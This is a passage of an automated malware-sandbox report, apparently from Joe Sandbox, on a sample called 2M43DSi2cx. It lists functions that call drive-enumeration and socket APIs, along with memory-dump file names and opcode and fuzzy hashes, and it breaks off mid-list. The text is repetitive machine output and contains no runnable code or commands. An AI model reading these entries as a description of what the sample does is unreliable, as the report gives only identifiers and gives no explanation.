                                                                • GetLogicalDrives.KERNELBASE ref: 06EB03AB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1427077143.0000000006EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6eb0000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID: A:\
                                                                • API String ID: 999431828-3379428675
                                                                • Opcode ID: 4011929e6e9044ab5f0fd25217c9c485708e22722ba13f0d5901d3b080d277c3
                                                                • Instruction ID: 113c5961f6e9c42667474dabfed6b7af1dd72283fe2f2468ce2a0d371792d380
                                                                • Opcode Fuzzy Hash: 4011929e6e9044ab5f0fd25217c9c485708e22722ba13f0d5901d3b080d277c3
                                                                • Instruction Fuzzy Hash: 2551D0FB54C311BE73C286912B58AFB6B6DE5D6730330B86AF803D6502E2946F4E51B1
                                                                Function 06EB01C5 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 254COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1427077143.0000000006EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6eb0000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: A:\
                                                                • API String ID: 0-3379428675
                                                                • Opcode ID: bc3ff7533e863fe5a1eb0d90daecad98123a10ecfa7ea8c49e0bfa2ca8ed05dc
                                                                • Instruction ID: a5c1c51358cebbba4d3dbcbfa9de9ca4cff0634eb86e8cf552b29b41717e1cbf
                                                                • Opcode Fuzzy Hash: bc3ff7533e863fe5a1eb0d90daecad98123a10ecfa7ea8c49e0bfa2ca8ed05dc
                                                                • Instruction Fuzzy Hash: 0A51D0EB50C311BEB38285912B58AFB6B6DE5D6730330B43AF803D6602E2946F4E51B1
                                                                Function 06EB0286 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 192COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLogicalDrives.KERNELBASE ref: 06EB03AB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1427077143.0000000006EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6eb0000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID: A:\
                                                                • API String ID: 999431828-3379428675
                                                                • Opcode ID: 851b646aa1aaa6a47d148f6dc8b975694e7c7dbb41022d7e8cf8fdb3bd03faa5
                                                                • Instruction ID: 28d7a9063e823e9a2d3d423183cc8c94a735767bc54e2764fb9724ff1f4c5d66
                                                                • Opcode Fuzzy Hash: 851b646aa1aaa6a47d148f6dc8b975694e7c7dbb41022d7e8cf8fdb3bd03faa5
                                                                • Instruction Fuzzy Hash: C14115EB54C311BE73C285912B58AFB6B6DE5D7730330B83AF403E6602E2946E0E51B1
                                                                Function 06EB028D Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1427077143.0000000006EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6eb0000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID: A:\
                                                                • API String ID: 999431828-3379428675
                                                                • Opcode ID: 08f69c4ab36606241544e43d54ed5f17a0d68d5fb596e87e57e8d94466f71305
                                                                • Instruction ID: 56df50983b6d5f822fe3e77e6f3a9ecd3665a511c98534f679d8b9bedb7e2894
                                                                • Opcode Fuzzy Hash: 08f69c4ab36606241544e43d54ed5f17a0d68d5fb596e87e57e8d94466f71305
                                                                • Instruction Fuzzy Hash: A74106EB54C311BE73D285902B58AFB6B6DE5D7730330B47AF403D6602E2946E0E51B5
                                                                Function 0042F7B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: CloseEvent
                                                                • String ID: multi.c
                                                                • API String ID: 2624557715-214371023
                                                                • Opcode ID: 7d77523aba88d6566e9c502d052799636c1fdc1d2ed8a6703dac597124a56952
                                                                • Instruction ID: 1c5624c32915e43ace45d609d16899ec2afad9bf023e0326129bfc34d1644868
                                                                • Opcode Fuzzy Hash: 7d77523aba88d6566e9c502d052799636c1fdc1d2ed8a6703dac597124a56952
                                                                • Instruction Fuzzy Hash: F951D7B1A003145BEB116A21BC42B9776A4AF5431CF88447EE84D9A253FB3DE50DC79A
                                                                Function 004278B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: closesocket
                                                                • String ID: FD %s:%d sclose(%d)
                                                                • API String ID: 2781271927-3116021458
                                                                • Opcode ID: 27116ef2146a67e15702c88fac2f78ab3d4881aa58648b3e45d5dbc366d03528
                                                                • Instruction ID: 2def8d5b7ce849c2db2b15b77a3ed65e8c9652a42998dd834005a9d8e9346e27
                                                                • Opcode Fuzzy Hash: 27116ef2146a67e15702c88fac2f78ab3d4881aa58648b3e45d5dbc366d03528
                                                                • Instruction Fuzzy Hash: 3AD0A733A09231BBC630A55ABC49C4B7BA8DDCAF60F4A4C99F944B7305D1309C0087F2
                                                                Function 004EB060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,004EB29E,?,00000000,?,?), ref: 004EB0BA
                                                                • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,004D3C41,00000000), ref: 004EB0C1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastconnect
                                                                • String ID:
                                                                • API String ID: 374722065-0
                                                                • Opcode ID: 7b70731bcc53784d4f326be1287603f18bc5fa4d487153ed6f0f5ec1b7735332
                                                                • Instruction ID: f8771569cfbc4f8792ae1be4a8f6068e4c4cb78a8ab92b0ea2673378b3c93429
                                                                • Opcode Fuzzy Hash: 7b70731bcc53784d4f326be1287603f18bc5fa4d487153ed6f0f5ec1b7735332
                                                                • Instruction Fuzzy Hash: 9001D8363042419BCA205A6ACC84E6BB399FF89365F040B65F978932D1D72AFD508792
                                                                Function 06EB02FA Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1427077143.0000000006EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6eb0000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID:
                                                                • API String ID: 999431828-0
                                                                • Opcode ID: d61101598dd028ab20422b9ec1e5da54a17f0948223702a475f1a7368557501f
                                                                • Instruction ID: 6006117068b3e9eb462d3ac1ae113c8f2a16f255d6d528896ba40905956c9410
                                                                • Opcode Fuzzy Hash: d61101598dd028ab20422b9ec1e5da54a17f0948223702a475f1a7368557501f
                                                                • Instruction Fuzzy Hash: 3F3139EB50C3117EB3D285A02B58AFB5B6EE5D7730330B47AF413D6602E2985E0E51B5
                                                                Function 004D4950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • gethostname.WS2_32(00000000,00000040), ref: 004D4AA4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: gethostname
                                                                • String ID:
                                                                • API String ID: 144339138-0
                                                                • Opcode ID: 43fe8c76b5815c8ee6c7d6936daa072c3bb4c37e916552fe354c94d5a92edf3b
                                                                • Instruction ID: 669342fdd207986518e9e8502b5bffab9c7c19de0a17fc43c0811ca353c5ff90
                                                                • Opcode Fuzzy Hash: 43fe8c76b5815c8ee6c7d6936daa072c3bb4c37e916552fe354c94d5a92edf3b
                                                                • Instruction Fuzzy Hash: C651B1B06047008BEB309B26DD6972376D4AF91329F18197FE98A867D1E77DE844C70A
                                                                Function 06EB03A4 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLogicalDrives.KERNELBASE ref: 06EB03AB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1427077143.0000000006EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6eb0000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID:
                                                                • API String ID: 999431828-0
                                                                • Opcode ID: 653e4f65ff840207e5fb25dfa533e131744f7910cbf8e0b4d6cce6cf09c03a5c
                                                                • Instruction ID: 655a58de516265929ef0b59fbcf79225266eb32d3cab53c4c7b01b3c7759acbb
                                                                • Opcode Fuzzy Hash: 653e4f65ff840207e5fb25dfa533e131744f7910cbf8e0b4d6cce6cf09c03a5c
                                                                • Instruction Fuzzy Hash: 1721D0FB14C3117D729285912B65AFB6B6EE4D7730330F83AF403E2606E2D45E4A1176
                                                                Function 004EAF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • getsockname.WS2_32(?,?,00000080), ref: 004EAFD1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: getsockname
                                                                • String ID:
                                                                • API String ID: 3358416759-0
                                                                • Opcode ID: 52f95ede78c980003e6d768398ac467b332793f594574fd17d1b1011915daf74
                                                                • Instruction ID: f01581724411437556a72b530152472e996b3723cdfb9ec92f3b789619675512
                                                                • Opcode Fuzzy Hash: 52f95ede78c980003e6d768398ac467b332793f594574fd17d1b1011915daf74
                                                                • Instruction Fuzzy Hash: 81118470808BC595EB268F19D4027E7B3F4EFD0329F109A19E59942150F7365AC68BC2
                                                                Function 004EA920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • send.WS2_32(?,?,?,00000000,00000000,?), ref: 004EA97F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: send
                                                                • String ID:
                                                                • API String ID: 2809346765-0
                                                                • Opcode ID: 1a9226f67971295c7bcd74d15bda201f3fe2ab2f0d7c14c74f171baa93bd81f2
                                                                • Instruction ID: 5f6b2ef1450ef4f2d3927f336df7c444b4203ba353698bc14efc509c1b37f8cf
                                                                • Opcode Fuzzy Hash: 1a9226f67971295c7bcd74d15bda201f3fe2ab2f0d7c14c74f171baa93bd81f2
                                                                • Instruction Fuzzy Hash: 1901A7B1B107109FC6148F15DC45B57B7A5EFC4721F0A8959F9981B361C331BC108BD2
                                                                Function 004EAF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • socket.WS2_32(?,004EB280,00000000,-00000001,00000000,004EB280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 004EAF66
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: socket
                                                                • String ID:
                                                                • API String ID: 98920635-0
                                                                • Opcode ID: cb8896b90977ed6814479eb35b38b98ce1e008a784ea905b7893c737b6188659
                                                                • Instruction ID: 5c618884293ffb2b5b6dd73b0b5a384e3ead653a70ce7e09d94999fac8c486ea
                                                                • Opcode Fuzzy Hash: cb8896b90977ed6814479eb35b38b98ce1e008a784ea905b7893c737b6188659
                                                                • Instruction Fuzzy Hash: 24E0EDB2A052216BD6649B58E8449ABF3A9EFC8B21F054A4ABC5463304C730BC508BE2
                                                                Function 004EB020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • closesocket.WS2_32(?,004E9422,?,?,?,?,?,?,?,?,?,?,?,w3M,008A9520,00000000), ref: 004EB04D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: closesocket
                                                                • String ID:
                                                                • API String ID: 2781271927-0
                                                                • Opcode ID: a68a8bff075e7f99698b6d7583281c9561f9de05f920438831ce729e4418e29b
                                                                • Instruction ID: d1d776cd6e9b4a31205c5311b5bacdd952e0a746ecdc2c179033c6c182132d63
                                                                • Opcode Fuzzy Hash: a68a8bff075e7f99698b6d7583281c9561f9de05f920438831ce729e4418e29b
                                                                • Instruction Fuzzy Hash: D7D0123470020157CA249A15C884A57766BBFD5711FA9CB68E42C8A655D73FEC478681
                                                                Function 004867E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ioctlsocket.WS2_32(?,8004667E,?,?,0045AF56,?,00000001), ref: 004867FC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
